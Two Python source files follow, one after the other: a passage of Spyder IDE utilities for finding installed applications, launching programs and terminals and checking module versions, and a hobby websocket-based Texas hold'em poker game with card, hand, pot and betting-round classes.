return subprocess.Popen(fullcmd, **subprocess_kwargs)
def parse_linux_desktop_entry(fpath):
"""Load data from desktop entry with xdg specification."""
from xdg.DesktopEntry import DesktopEntry
try:
entry = DesktopEntry(fpath)
entry_data = {}
entry_data['name'] = entry.getName()
entry_data['icon_path'] = entry.getIcon()
entry_data['exec'] = entry.getExec()
entry_data['type'] = entry.getType()
entry_data['hidden'] = entry.getHidden()
entry_data['fpath'] = fpath
except Exception:
entry_data = {
'name': '',
'icon_path': '',
'hidden': '',
'exec': '',
'type': '',
'fpath': fpath
}
return entry_data
def _get_mac_application_icon_path(app_bundle_path):
"""Parse mac application bundle and return path for *.icns file."""
import plistlib
contents_path = info_path = os.path.join(app_bundle_path, 'Contents')
info_path = os.path.join(contents_path, 'Info.plist')
pl = {}
if os.path.isfile(info_path):
try:
# readPlist is deprecated but needed for py27 compat
pl = plistlib.readPlist(info_path)
except Exception:
pass
icon_file = pl.get('CFBundleIconFile')
icon_path = None
if icon_file:
icon_path = os.path.join(contents_path, 'Resources', icon_file)
# Some app bundles seem to list the icon name without extension
if not icon_path.endswith('.icns'):
icon_path = icon_path + '.icns'
if not os.path.isfile(icon_path):
icon_path = None
return icon_path
def get_username():
"""Return current session username."""
if os.name == 'nt':
username = os.getlogin()
else:
import pwd
username = pwd.getpwuid(os.getuid())[0]
return username
def _get_win_reg_info(key_path, hive, flag, subkeys):
"""
See: https://stackoverflow.com/q/53132434
"""
import winreg
reg = winreg.ConnectRegistry(None, hive)
software_list = []
try:
key = winreg.OpenKey(reg, key_path, 0, winreg.KEY_READ | flag)
count_subkey = winreg.QueryInfoKey(key)[0]
for index in range(count_subkey):
software = {}
try:
subkey_name = winreg.EnumKey(key, index)
if not (subkey_name.startswith('{')
and subkey_name.endswith('}')):
software['key'] = subkey_name
subkey = winreg.OpenKey(key, subkey_name)
for property in subkeys:
try:
value = winreg.QueryValueEx(subkey, property)[0]
software[property] = value
except EnvironmentError:
software[property] = ''
software_list.append(software)
except EnvironmentError:
continue
except Exception:
pass
return software_list
def _clean_win_application_path(path):
"""Normalize windows path and remove extra quotes."""
path = path.replace('\\', '/').lower()
# Check for quotes at start and end
if path[0] == '"' and path[-1] == '"':
path = literal_eval(path)
return path
def _get_win_applications():
"""Return all system installed windows applications."""
import winreg
# See:
# https://docs.microsoft.com/en-us/windows/desktop/shell/app-registration
key_path = 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths'
# Hive and flags
hfs = [
(winreg.HKEY_LOCAL_MACHINE, winreg.KEY_WOW64_32KEY),
(winreg.HKEY_LOCAL_MACHINE, winreg.KEY_WOW64_64KEY),
(winreg.HKEY_CURRENT_USER, 0),
]
subkeys = [None]
sort_key = 'key'
app_paths = {}
_apps = [_get_win_reg_info(key_path, hf[0], hf[1], subkeys) for hf in hfs]
software_list = itertools.chain(*_apps)
for software in sorted(software_list, key=lambda x: x[sort_key]):
if software[None]:
key = software['key'].capitalize().replace('.exe', '')
expanded_fpath = os.path.expandvars(software[None])
expanded_fpath = _clean_win_application_path(expanded_fpath)
app_paths[key] = expanded_fpath
# See:
# https://www.blog.pythonlibrary.org/2010/03/03/finding-installed-software-using-python/
# https://stackoverflow.com/q/53132434
key_path = 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall'
subkeys = ['DisplayName', 'InstallLocation', 'DisplayIcon']
sort_key = 'DisplayName'
apps = {}
_apps = [_get_win_reg_info(key_path, hf[0], hf[1], subkeys) for hf in hfs]
software_list = itertools.chain(*_apps)
for software in sorted(software_list, key=lambda x: x[sort_key]):
location = software['InstallLocation']
name = software['DisplayName']
icon = software['DisplayIcon']
key = software['key']
if name and icon:
icon = icon.replace('"', '')
icon = icon.split(',')[0]
if location == '' and icon:
location = os.path.dirname(icon)
if not os.path.isfile(icon):
icon = ''
if location and os.path.isdir(location):
files = [f for f in os.listdir(location)
if os.path.isfile(os.path.join(location, f))]
if files:
for fname in files:
fn_low = fname.lower()
valid_file = fn_low.endswith(('.exe', '.com', '.bat'))
if valid_file and not fn_low.startswith('unins'):
fpath = os.path.join(location, fname)
expanded_fpath = os.path.expandvars(fpath)
expanded_fpath = _clean_win_application_path(
expanded_fpath)
apps[name + ' (' + fname + ')'] = expanded_fpath
# Join data
values = list(zip(*apps.values()))[-1]
for name, fpath in app_paths.items():
if fpath not in values:
apps[name] = fpath
return apps
def _get_linux_applications():
"""Return all system installed linux applications."""
# See:
# https://standards.freedesktop.org/desktop-entry-spec/desktop-entry-spec-latest.html
# https://askubuntu.com/q/433609
apps = {}
desktop_app_paths = [
'/usr/share/**/*.desktop',
'~/.local/share/**/*.desktop',
]
all_entries_data = []
for path in desktop_app_paths:
fpaths = glob.glob(path)
for fpath in fpaths:
entry_data = parse_linux_desktop_entry(fpath)
all_entries_data.append(entry_data)
for entry_data in sorted(all_entries_data, key=lambda x: x['name']):
if not entry_data['hidden'] and entry_data['type'] == 'Application':
apps[entry_data['name']] = entry_data['fpath']
return apps
def _get_mac_applications():
"""Return all system installed osx applications."""
apps = {}
app_folders = [
'/**/*.app',
'/Users/{}/**/*.app'.format(get_username())
]
fpaths = []
for path in app_folders:
fpaths += glob.glob(path)
for fpath in fpaths:
if os.path.isdir(fpath):
name = os.path.basename(fpath).split('.app')[0]
apps[name] = fpath
return apps
def get_application_icon(fpath):
"""Return application icon or default icon if not found."""
from qtpy.QtGui import QIcon
from spyder.utils.icon_manager import ima
if os.path.isfile(fpath) or os.path.isdir(fpath):
icon = ima.icon('no_match')
if sys.platform == 'darwin':
icon_path = _get_mac_application_icon_path(fpath)
if icon_path and os.path.isfile(icon_path):
icon = QIcon(icon_path)
elif os.name == 'nt':
pass
else:
entry_data = parse_linux_desktop_entry(fpath)
icon_path = entry_data['icon_path']
if icon_path:
if os.path.isfile(icon_path):
icon = QIcon(icon_path)
else:
icon = QIcon.fromTheme(icon_path)
else:
icon = ima.icon('help')
return icon
def get_installed_applications():
"""
Return all system installed applications.
The return value is a list of tuples where the first item is the icon path
and the second item is the program executable path.
"""
apps = {}
if sys.platform == 'darwin':
apps = _get_mac_applications()
elif os.name == 'nt':
apps = _get_win_applications()
else:
apps = _get_linux_applications()
if sys.platform == 'darwin':
apps = {key: val for (key, val) in apps.items() if osp.isdir(val)}
else:
apps = {key: val for (key, val) in apps.items() if osp.isfile(val)}
return apps
def open_files_with_application(app_path, fnames):
"""
Generalized method for opening files with a specific application.
Returns a dictionary of the command used and the return code.
A code equal to 0 means the application executed successfully.
"""
return_codes = {}
if os.name == 'nt':
fnames = [fname.replace('\\', '/') for fname in fnames]
if sys.platform == 'darwin':
if not (app_path.endswith('.app') and os.path.isdir(app_path)):
raise ValueError('`app_path` must point to a valid OSX '
'application!')
cmd = ['open', '-a', app_path] + fnames
try:
return_code = subprocess.call(cmd)
except Exception:
return_code = 1
return_codes[' '.join(cmd)] = return_code
elif os.name == 'nt':
if not (app_path.endswith(('.exe', '.bat', '.com', '.cmd'))
and os.path.isfile(app_path)):
raise ValueError('`app_path` must point to a valid Windows '
'executable!')
cmd = [app_path] + fnames
try:
return_code = subprocess.call(cmd)
except OSError:
return_code = 1
return_codes[' '.join(cmd)] = return_code
else:
if not (app_path.endswith('.desktop') and os.path.isfile(app_path)):
raise ValueError('`app_path` must point to a valid Linux '
'application!')
entry = parse_linux_desktop_entry(app_path)
app_path = entry['exec']
multi = []
extra = []
if len(fnames) == 1:
fname = fnames[0]
if '%u' in app_path:
cmd = app_path.replace('%u', fname)
elif '%f' in app_path:
cmd = app_path.replace('%f', fname)
elif '%U' in app_path:
cmd = app_path.replace('%U', fname)
elif '%F' in app_path:
cmd = app_path.replace('%F', fname)
else:
cmd = app_path
extra = fnames
elif len(fnames) > 1:
if '%U' in app_path:
cmd = app_path.replace('%U', ' '.join(fnames))
elif '%F' in app_path:
cmd = app_path.replace('%F', ' '.join(fnames))
if '%u' in app_path:
for fname in fnames:
multi.append(app_path.replace('%u', fname))
elif '%f' in app_path:
for fname in fnames:
multi.append(app_path.replace('%f', fname))
else:
cmd = app_path
extra = fnames
if multi:
for cmd in multi:
try:
return_code = subprocess.call([cmd], shell=True)
except Exception:
return_code = 1
return_codes[cmd] = return_code
else:
try:
return_code = subprocess.call([cmd] + extra, shell=True)
except Exception:
return_code = 1
return_codes[cmd] = return_code
return return_codes
def python_script_exists(package=None, module=None):
"""
Return absolute path if Python script exists (otherwise, return None)
package=None -> module is in sys.path (standard library modules)
"""
assert module is not None
if package is None:
spec = importlib.util.find_spec(module)
if spec:
path = spec.origin
else:
path = None
else:
spec = importlib.util.find_spec(package)
if spec:
path = osp.join(spec.origin, module)+'.py'
else:
path = None
if path:
if not osp.isfile(path):
path += 'w'
if osp.isfile(path):
return path
def run_python_script(package=None, module=None, args=[], p_args=[]):
"""
Run Python script in a separate process
package=None -> module is in sys.path (standard library modules)
"""
assert module is not None
assert isinstance(args, (tuple, list)) and isinstance(p_args, (tuple, list))
path = python_script_exists(package, module)
run_program(sys.executable, p_args + [path] + args)
def shell_split(text):
"""
Split the string `text` using shell-like syntax
This avoids breaking single/double-quoted strings (e.g. containing
strings with spaces). This function is almost equivalent to the shlex.split
function (see standard library `shlex`) except that it is supporting
unicode strings (shlex does not support unicode until Python 2.7.3).
"""
assert is_text_string(text) # in case a QString is passed...
pattern = r'(\s+|(?<!\\)".*?(?<!\\)"|(?<!\\)\'.*?(?<!\\)\')'
out = []
for token in re.split(pattern, text):
if token.strip():
out.append(token.strip('"').strip("'"))
return out
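# shell_split example: shell_split('run "my file.py" --flag') -> ['run', 'my file.py', '--flag']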
def get_python_args(fname, python_args, interact, debug, end_args):
"""Construct Python interpreter arguments"""
p_args = []
if python_args is not None:
p_args += python_args.split()
if interact:
p_args.append('-i')
if debug:
p_args.extend(['-m', 'pdb'])
if fname is not None:
if os.name == 'nt' and debug:
# When calling pdb on Windows, one has to replace backslashes by
# slashes to avoid confusion with escape characters (otherwise,
# for example, '\t' will be interpreted as a tabulation):
p_args.append(osp.normpath(fname).replace(os.sep, '/'))
else:
p_args.append(fname)
if end_args:
p_args.extend(shell_split(end_args))
return p_args
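# get_python_args example: get_python_args('script.py', '-O', True, False, '--foo 1')
# returns ['-O', '-i', 'script.py', '--foo', '1'].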
def run_python_script_in_terminal(fname, wdir, args, interact,
debug, python_args, executable=None):
"""
Run Python script in an external system terminal.
:str wdir: working directory, may be empty.
"""
if executable is None:
executable = get_python_executable()
# If fname or python_exe contains spaces, it can't be run on Windows, so we
# have to enclose them in quotes. Also wdir can come with / as os.sep, so
# we need to take care of it.
if os.name == 'nt':
fname = '"' + fname + '"'
wdir = wdir.replace('/', '\\')
executable = '"' + executable + '"'
p_args = [executable]
p_args += get_python_args(fname, python_args, interact, debug, args)
if os.name == 'nt':
cmd = 'start cmd.exe /K "'
if wdir:
cmd += 'cd ' + wdir + ' && '
cmd += ' '.join(p_args) + '"' + ' ^&^& exit'
# Command line and cwd have to be converted to the filesystem
# encoding before passing them to subprocess, but only for
# Python 2.
# See https://bugs.python.org/issue1759845#msg74142 and
# spyder-ide/spyder#1856.
if PY2:
cmd = encoding.to_fs_from_unicode(cmd)
wdir = encoding.to_fs_from_unicode(wdir)
try:
if wdir:
run_shell_command(cmd, cwd=wdir)
else:
run_shell_command(cmd)
except WindowsError:
from qtpy.QtWidgets import QMessageBox
from spyder.config.base import _
QMessageBox.critical(None, _('Run'),
_("It was not possible to run this file in "
"an external terminal"),
QMessageBox.Ok)
elif sys.platform.startswith('linux'):
programs = [{'cmd': 'gnome-terminal',
'wdir-option': '--working-directory',
'execute-option': '-x'},
{'cmd': 'konsole',
'wdir-option': '--workdir',
'execute-option': '-e'},
{'cmd': 'xfce4-terminal',
'wdir-option': '--working-directory',
'execute-option': '-x'},
{'cmd': 'xterm',
'wdir-option': None,
'execute-option': '-e'},]
for program in programs:
if is_program_installed(program['cmd']):
arglist = []
if program['wdir-option'] and wdir:
arglist += [program['wdir-option'], wdir]
arglist.append(program['execute-option'])
arglist += p_args
if wdir:
run_program(program['cmd'], arglist, cwd=wdir)
else:
run_program(program['cmd'], arglist)
return
elif sys.platform == 'darwin':
f = tempfile.NamedTemporaryFile('wt', prefix='run_spyder_',
suffix='.sh', dir=get_temp_dir(),
delete=False)
if wdir:
f.write('cd {}\n'.format(wdir))
if running_in_mac_app(executable):
f.write(f'export PYTHONHOME={os.environ["PYTHONPATH"]}\n')
f.write(' '.join(p_args))
f.close()
os.chmod(f.name, 0o777)
def run_terminal_thread():
proc = run_shell_command('open -a Terminal.app ' + f.name, env={})
# Prevent race condition
time.sleep(3)
proc.wait()
os.remove(f.name)
thread = threading.Thread(target=run_terminal_thread)
thread.start()
else:
raise NotImplementedError
def check_version(actver, version, cmp_op):
"""
Check version string of an active module against a required version.
If dev/prerelease tags result in TypeError for string-number comparison,
it is assumed that the dependency is satisfied.
Users on dev branches are responsible for keeping their own packages up to
date.
Copyright (C) 2013 The IPython Development Team
Distributed under the terms of the BSD License.
"""
if isinstance(actver, tuple):
actver = '.'.join([str(i) for i in actver])
try:
if cmp_op == '>':
return parse_version(actver) > parse_version(version)
elif cmp_op == '>=':
return parse_version(actver) >= parse_version(version)
elif cmp_op == '=':
return parse_version(actver) == parse_version(version)
elif cmp_op == '<':
return parse_version(actver) < parse_version(version)
elif cmp_op == '<=':
return parse_version(actver) <= parse_version(version)
else:
return False
except TypeError:
return True
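# check_version examples: check_version('3.7.1', '3.6', '>=') is True, while
# check_version((2, 7, 0), '3.0', '>=') is False (tuples are joined into a version string).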
def get_module_version(module_name):
"""Return module version or None if version can't be retrieved."""
ver = None
try:
mod = __import__(module_name)
ver = getattr(mod, '__version__', getattr(mod, 'VERSION', None))
except ModuleNotFoundError:
pass
if not ver:
ver = get_package_version(module_name)
return ver
def get_package_version(package_name):
"""Return package version or None if version can't be retrieved."""
# When support for Python 3.7 and below is dropped, this can be replaced
# with the built-in importlib.metadata.version
try:
ver = pkg_resources.get_distribution(package_name).version
return ver
except pkg_resources.DistributionNotFound:
return None
def is_module_installed(module_name, version=None, interpreter=None):
"""
Return True if module ``module_name`` is installed
If ``version`` is not None, checks that the module's installed version is
consistent with ``version``. The module must have an attribute named
'__version__' or 'VERSION'.
version may start with =, >=, > or < to specify the exact requirement ;
multiple conditions may be separated by ';' (e.g. '>=0.13;<1.0')
If ``interpreter`` is not None, checks if a module is installed with a
given ``version`` in the ``interpreter``'s environment. Otherwise checks
in Spyder's environment.
"""
if interpreter is not None:
if is_python_interpreter(interpreter):
cmd = dedent("""
try:
import {} as mod
except Exception:
print('No Module') # spyder: test-skip
print(getattr(mod, '__version__', getattr(mod, 'VERSION', None))) # spyder: test-skip
""").format(module_name)
try:
# use clean environment
proc = run_program(interpreter, ['-c', cmd], env={})
stdout, stderr = proc.communicate()
stdout = stdout.decode().strip()
except Exception:
return False
if 'No Module' in stdout:
return False
elif stdout != 'None':
# the module is installed and it has a version attribute
module_version = stdout
else:
module_version = None
else:
# Try to not take a wrong decision if interpreter check fails
return True
else:
# interpreter is None, just get module version in Spyder environment
try:
module_version = get_module_version(module_name)
except Exception:
# Module is not installed
return False
# This can happen if a package was not uninstalled correctly. For
# instance, if its main __pycache__ directory is left behind.
try:
mod = __import__(module_name)
if not getattr(mod, '__file__', None):
return False
except Exception:
pass
if version is None:
return True
else:
if ';' in version:
versions = version.split(';')
else:
versions = [version]
output = True
for _ver in versions:
match = re.search(r'[0-9]', _ver)
assert match is not None, "Invalid version number"
symb = _ver[:match.start()]
if not symb:
symb = '='
assert symb in ('>=', '>', '=', '<', '<='),\
"Invalid version condition '%s'" % symb
ver = _ver[match.start():]
output = output and check_version(module_version, ver, symb)
return output
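# Illustrative usage (added note; the package name is only an example, not a
# dependency of this file): the compound syntax documented above means that
#     is_module_installed('numpy', '>=1.0;<3.0')
# splits the spec on ';' and requires every condition to hold for the version found
# in Spyder's environment (or in ``interpreter``'s environment when one is given).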
def is_python_interpreter_valid_name(filename):
"""Check that the python interpreter file has a valid name."""
pattern = r'.*python(\d\.?\d*)?(w)?(.exe)?$'
if re.match(pattern, filename, flags=re.I) is None:
return False
else:
return True
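# Illustrative examples (added note, not in the original source) of names accepted
# by the pattern above: 'python', 'python3', 'python3.11', 'pythonw.exe' and
# 'Python.exe' all match (the check is case-insensitive), while something like
# 'notpython.txt' is rejected.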
def is_python_interpreter(filename):
"""Evaluate whether a file is a python interpreter or not."""
real_filename = os.path.realpath(filename) # To follow symlink if existent
if (not osp.isfile(real_filename) or
not is_python_interpreter_valid_name(filename)):
return False
elif is_pythonw(filename):
if os.name == 'nt':
# pythonw is a binary on Windows
if not encoding.is_text_file(real_filename):
return True
else:
return False
elif sys.platform == 'darwin':
# pythonw is a text file in Anaconda but a binary in
# the system
if is_anaconda() and encoding.is_text_file(real_filename):
return True
elif not encoding.is_text_file(real_filename):
return True
else:
return False
else:
# There's no pythonw in other systems
return False
elif encoding.is_text_file(real_filename):
# A text file at this point cannot be a valid interpreter binary
return False
else:
return check_python_help(filename)
def is_pythonw(filename):
"""Check that the python interpreter has 'pythonw'."""
pattern = r'.*python(\d\.?\d*)?w(.exe)?$'
if re.match(pattern, filename, flags=re.I) is None:
return False
else:
return True
def check_python_help(filename):
"""Check that the python interpreter can compile and provide the zen."""
try:
proc = run_program(filename, ['-c', 'import this'], env={})
stdout, _ = proc.communicate()
stdout = to_text_string(stdout)
valid_lines = [
'Beautiful is better than ugly.',
'Explicit is better than implicit.',
'Simple is better than complex.',
'Complex is better than complicated.',
]
if all(line in stdout for line in valid_lines):
return True
else:
return False
except Exception:
return False
def is_spyder_process(pid):
"""
Test whether given PID belongs to a Spyder process.
This is checked by testing the first three command line arguments. This
function returns a bool. If there is no process with this PID or its
command line cannot be accessed (perhaps because the process is owned by
another user), then the function returns False.
"""
try:
p = psutil.Process(int(pid))
# Valid names for main script
names = set(['spyder', 'spyder3', 'spyder.exe', 'spyder3.exe',
'bootstrap.py', 'spyder-script.py', 'Spyder.launch.pyw'])
if running_under_pytest():
names.add('runtests.py')
# Check the first three command line arguments
arguments = set(os.path.basename(arg) for arg in p.cmdline()[:3])
conditions = [names & arguments]
return any(conditions)
except (psutil.NoSuchProcess, psutil.AccessDenied):
return False
def get_interpreter_info(path):
"""Return version information of the selected Python interpreter."""
try:
out, __ = run_program(path, ['-V']).communicate()
out = out.decode()
except Exception:
out = ''
return out.strip()
def find_git():
"""Find git executable in the system."""
if sys.platform == 'darwin':
proc = subprocess.run(
osp.join(HERE, "check-git.sh"), capture_output=True)
if proc.returncode != 0:
return None
return find_program('git')
else:
return find_program('git')
|
poker.py
|
import time
import random
import pokerhands
from operator import attrgetter
import pokerstrat
import server
from threading import Thread
from websocket_server import WebsocketServer
#card class
class Card:
RANKS=['2','3','4','5','6','7','8','9','10','J', 'Q', 'K', 'A']
SUITS=['h', 'c', 's', 'd']
def __init__(self,rank, suit, faceup=True):
self.rank=rank
self.suit=suit
self.values=[]
self.__value=(Card.RANKS.index(self.rank)+1)
self.faceup=faceup
def __str__(self):
if self.faceup:
return str(self.rank)+str(self.suit)
else:
return 'XX'
@property
def value(self):
v=self.__value
return v
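# Note (added for clarity, not in the original source): Card.value is simply the
# 1-based index into RANKS, so '2' -> 1, '10' -> 9, 'J' -> 10, 'Q' -> 11,
# 'K' -> 12 and 'A' -> 13.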
#hand class (also used for Player)
class Hand:
serial=0
def __init__(self, name, table, server, strategy='Random'):
self.strategy=[]
self.stratname=strategy
strategy_class=getattr(pokerstrat, strategy)
strat=strategy_class(self)
self.strategy.append(strat)
self.server = server
self.cards=[]
self.total_cards=(self.cards+table.cards)
table.players.append(self)
self.name=name
Hand.serial+=1
self.position=Hand.serial
self.small_blind=False
self.big_blind=False
self.dealer=False
self.hand_value=0
self.rep=''
self.tie_break=0
self.raw_data=0
self.is_folded=False
self.stack=1000
self.stake=0
self.in_pot=0
self.to_play=0
self.all_in=False
self.first_all_in=False
self.raised=0
self.carry_over=0
#data points for play analysis:
self.history=[]
self.pots_played=0
self.win=0
self.raises=0
self.calls=0
self.checks=0
@property
def play_analysis(self):
pass
@property
def get_position(self):
return self.position%pot.table_size
def __str__(self):
rep='\n'+str(self.name)+'\t stack='+str(self.stack)+'\n'
if self.small_blind:
rep+=' small blind'
elif self.big_blind:
rep+=' big blind'
elif self.dealer:
rep+=' dealer'
return rep
def get_value(self):
self.total_cards=(self.cards+table.cards)
rep, hand_value, tie_break, raw_data=pokerhands.evaluate_hand(self.total_cards)
self.rep=str(rep)
self.hand_value=hand_value
self.tie_break=tie_break
self.raw_data=raw_data
return hand_value, rep, tie_break, raw_data
def print_cards(self):
rep=''
if self.is_folded:
rep='FF'
else:
for card in self.cards:
rep+=str(card)+' '
print (rep)
def flip(self):
for card in self.cards: card.faceup=not card.faceup
def fold(self, pot):
self.is_folded=True
self.in_pot=0
self.stake=0
self.raised=0
print (str(self.name)+' folds')
pot.folded_players.append(self)
if self in pot.active_players:
pot.active_players.remove(self)
if pot.one_remaining:
pot.stage=5
def no_play(self, pot):
next_player(pot)
self.stake=0
def check_call(self, pot):
if self.to_play==0:
print (str(self.name)+' checks')
else:
if self.to_play>self.stack:
self.stake=self.stack
else:
self.stake=self.to_play
print (str(self.name)+' calls '+str(self.stake))
if pot.stage==0 and pot.raised==False:
pot.limpers+=1
next_player(pot)
def bet(self, pot, stake):
if pot.already_bet:
print (str(self.name)+' raises '+str(stake-self.to_play))
self.raised+=1
pot.limpers=0
pot.raised=True
else:
print (str(self.name)+' bets '+str(stake))
pot.already_bet=True
self.stake=stake
pots[-1].to_play+=(self.stake-self.to_play)
next_player(pot, True)
def ante(self, pot):
if self.small_blind:
self.stack-=BLINDS[0]
pot.total+=BLINDS[0]
self.in_pot+=BLINDS[0]
if self.big_blind:
self.stack-=BLINDS[1]
pot.total+=BLINDS[1]
pot.to_play=BLINDS[1]
self.in_pot+=BLINDS[1]
def bust(self):
print (str(self.name)+' is bust')
list_index=table.players.index(self)
for p in table.players[list_index+1:]:
p.position-=1
table.players.remove(self)
def clear(self):
self.cards=[]
self.is_folded=False
self.all_in=False
self.raised=0
def add(self, cards):
self.cards.append(cards)
#__________represents the card deck - shuffled each round
class Deck(Hand):
def __init__(self):
self.cards=[]
def populate(self):
for rank in Card.RANKS:
for suit in Card.SUITS:
card=Card(rank, suit)
self.cards.append(card)
def shuffle(self):
random.shuffle(self.cards)
def print_cards(self):
rep=''
for card in self.cards:
rep+=str(card)+' '
print (rep)
def deal_to(self, hand, cards=1, faceup=True):
if len(self.cards)<cards:
print ('not enough cards to deal')
elif len(self.cards)==0:
print ('deck empty')
else:
dealt=[]
if not faceup:
for card in self.cards:
card.faceup=False
for i in range (0,cards):
dealt.append(self.cards.pop())
for card in dealt:
hand.add(card)
#__________________represents the overall game
class Table(Hand):
def __init__(self):
self.cards=[]
self.players=[]
self.is_folded=False
self.button=0
self.hands=0
self.blinds_timer=0
def print_cards(self):
rep='Community cards_______________\n'
if self.is_folded:
rep='FF'
else:
for card in self.cards:
card.faceup=True
rep+=str(card)+' '
print (rep)
def print_players(self):
for player in self.players:
print (player)
def clear(self):
self.cards=[]
#_______________POT represents the pot for each individual round of play
class Pot(object):
stage_dict={0:'pre-flop bet', 1:'dealing the flop', 2:'dealing the turn', 3:'dealing the river'}
deal_sequence=[0,3,1,1]
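# Note (added for clarity): deal_sequence holds the number of community cards dealt
# at each stage -- 0 pre-flop, 3 on the flop, then 1 each for the turn and river --
# and the game loop below indexes it as Pot.deal_sequence[pot.stage].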
pot_number=0
def __init__(self, table, name):
self.players=[]
self.folded_players=[]
self.active_players=[]
self.limpers=0
self.name=name
self.blinds=BLINDS
self.total=0
self.button=table.button
#the amount each player has to call
self.to_play=0
#0=antes+ pre-flop, 1=post-flop, 2=turn, 3=river
self.stage=0
#defines turn within each betting stage
self.turn=0
#self.no_raise
self.no_raise=0
#already bet - works out if the round starts with 0 bet
self.already_bet=False
self.raised=False
@property
def is_frozen(self):
if len(self.active_players)<=1:
self.active_players=[]
return True
else:
return False
@property
def yet_to_play(self):
ytp=self.table_size-(self.turn+1)
if ytp<1: ytp=1
return ytp
@property
def one_remaining(self):
if len(self.folded_players)==(self.table_size-1):
return True
else:
return False
@property
def table_size(self):
return len(self.players)
def __str__(self):
rep='Pot= '+str(self.total)+'. to play:'+str(self.to_play)
return rep
def set_blinds(self):
dealer=(self.button)%self.table_size
small_blind=(self.button+1)%self.table_size
big_blind=(self.button+2)%self.table_size
self.players[dealer].dealer=True
self.players[small_blind].small_blind=True
self.players[big_blind].big_blind=True
return
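# Worked example (added for clarity; the numbers are illustrative): with 4 players
# and table.button == 1, set_blinds() marks players[1] as dealer, players[2] as
# small blind and players[3] as big blind; the modulo arithmetic wraps these
# positions around once the button moves past the end of the player list.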
@property
def who_plays(self):
next_up=0
if self.stage==0:
next_up=(self.button+3)%self.table_size
return next_up
else:
next_up=(self.button+1)%self.table_size
return next_up
class Side_pot(Pot):
serial=0
def __init__(self, parent):
Pot.__init__(self, parent, Pot)
self.button=parent.button
Side_pot.serial+=1
self.name='side pot '+str(Side_pot.serial)
self.players=[]
table=Table()
players = {}
# https://github.com/Pithikos/python-websocket-server/blob/master/server.py
# Called for every client connecting (after handshake)
def new_client(client, server):
print("New client connected and was given id %d" % client['id'])
server.send_message_to_all("Hey all, a new client has joined us")
# Called for every client disconnecting
def client_left(client, server):
for i in players.values():
if (i[1] == client['id']):
print(table.players)
print(players)
print(i[0].name)
#table.players.remove(i[0])
print("Client(%d) disconnected" % client['id'])
# Called when a client sends a message
def message_received(client, server, message):
print(message)
if len(message) > 200:
message = message[:200]+'..'
m = message.split(":")
if(m[0] == 'join'):
print("new player joined the table")
players[m[1]] = (Hand(m[1], table, server, 'Human'), client)
if(m[1] == 'turn'):
cur = players[m[1]][0]
#print("Client(%d) said: %s" % (client['id'], message))
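# Note (added for clarity, not in the original source): clients drive the game with
# colon-separated messages; a payload such as "join:Alice" creates a Hand named
# "Alice" using the 'Human' strategy and remembers the sending client, which is how
# betting_round() later sends prompts to that individual player via players[name][1].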
PORT=24
s = WebsocketServer(PORT)
s.set_fn_new_client(new_client)
s.set_fn_client_left(client_left)
s.set_fn_message_received(message_received)
sockThread = Thread(target=s.run_forever, name="WebSocket")
sockThread.daemon = True
sockThread.start()
#________________FUNCTIONS____________________________________________________
#clears the players hands, comm cards, deck and moves the button on
def debug(pot):
print('debug______________________')
for player in pot.players:
print (str(player.name)+' Stack='+str(player.stack)+' Stake='+str(player.stake)+' Player in pot='+str(player.in_pot)+' Pot total='+str(pot.total)+' all_in='+str(player.all_in)+'first all in'+str(player.first_all_in))
print ('is folded'+str(player.is_folded))
print ('raw data='+str(player.raw_data))
print ('position='+str(player.position))
for pot in pots:
print (str(pot.name)+' total '+ str(pot.total))
print ('yet to play:'+str(pot.yet_to_play))
print ('active players')
for player in pot.active_players:
print (str(player.name))
print ('table size '+str(pot.table_size))
print ('limpers='+str(pot.limpers))
print ('no raise '+str(pot.no_raise))
print ('frozen='+str(pot.is_frozen))
print ('one remaining='+str(pot.one_remaining))
print ('Pot to play: '+str(pot.to_play))
print ('turn'+str(pot.turn)+' no_raise'+str(pot.no_raise))
print ('______________________________')
#helper function to move the play on
def next_player(pot, is_raise=False):
pot.turn+=1
if is_raise:
pot.no_raise=1
else:
pot.no_raise+=1
return
def next_hand(table, deck):
table.clear()
deck.clear()
Side_pot.serial=0
for hand in table.players:
hand.clear()
hand.small_blind=False
hand.big_blind=False
hand.dealer=False
hand.first_all_in=False
table.button+=1
#calculates the values and payouts
def ante_up(pot):
for player in pot.players:
player.ante(pot)
print (player)
deck.deal_to(player, 2)
if player.stratname=='Human':
player.flip()
player.print_cards()
pot.already_bet=True
print (pot)
print ('\n\n\n')
def betting_round(pot, table):
global pots
is_side_pot=False
create_side_pot=False
side_potters=[]
while pot.no_raise<(pot.table_size):
next_up=(int(pot.who_plays)+(pot.turn))%pot.table_size
player=pot.players[next_up]
player.to_play=(pots[-1].to_play-player.in_pot)
if player.to_play<0:
player.to_play=0
#is the player folded? decide action
if pots[-1].is_frozen==False:
if player in pots[-1].active_players:
print (str(player.name)+' to play '+ str(player.to_play)+'\n')
for strategy in player.strategy:
# Get player move and update all clients
if(player.stratname == 'Human'):
player.get_value()
# options=[['x', 'f', 'b'], ['c', 'r', 'f'], ['c', 'f']]
# choices={0:'check, fold or bet', 1:'call, raise, fold', 2:'call all-in or fold'}
# action=''
op=0
if player.to_play==0:
op=0
elif player.to_play<player.stack:
op=1
else: op=2
s.send_message_to_all(str(player.name)+' to play '+ str(player.to_play)+'\n')
s.send_message(players[str(player.name)][1], str(op))
c = 30
while c > -1:
s.send_message_to_all("time:"+str(player.name)+":"+str(c))
time.sleep(1)
c-=1
player.no_play(pot)
else:
s.send_message_to_all(str(player.name)+' to play '+ str(player.to_play)+'\n')
strategy.decide_play(player, pots[-1])
else:
player.no_play(pot)
else:
player.no_play(pot)
#adjust player totals and check for all-ins
pots[-1].total+=player.stake
player.in_pot+=player.stake
player.stack-=player.stake
if player.stack==0 and player.first_all_in==False:
print (str(player.name)+' is all in ')
is_side_pot=True
player.all_in=True
player.first_all_in=True
#debug(pot)
if pots[-1].one_remaining:
is_side_pot=False
#deal with refunds_____________________________
if is_side_pot:
for player in pots[-1].players:
if player.is_folded==False:
side_potters.append(player)
side_potters.sort(key=attrgetter('in_pot'), reverse=True)
big_bet=side_potters[0].in_pot
next_pot_players=[]
#main pot refund_____________________
print ('side pot')
print ('high bet'+str(big_bet))
low_bet=side_potters[-1].in_pot
print ('low bet'+str(low_bet))
for player in side_potters:
refund=(player.in_pot-low_bet)
if len(next_pot_players)>1:
create_side_pot=True
player.in_pot-=refund
pot.total-=refund
player.stack+=refund
player.carry_over=refund
print ('player in side pot - '+str(player.name))
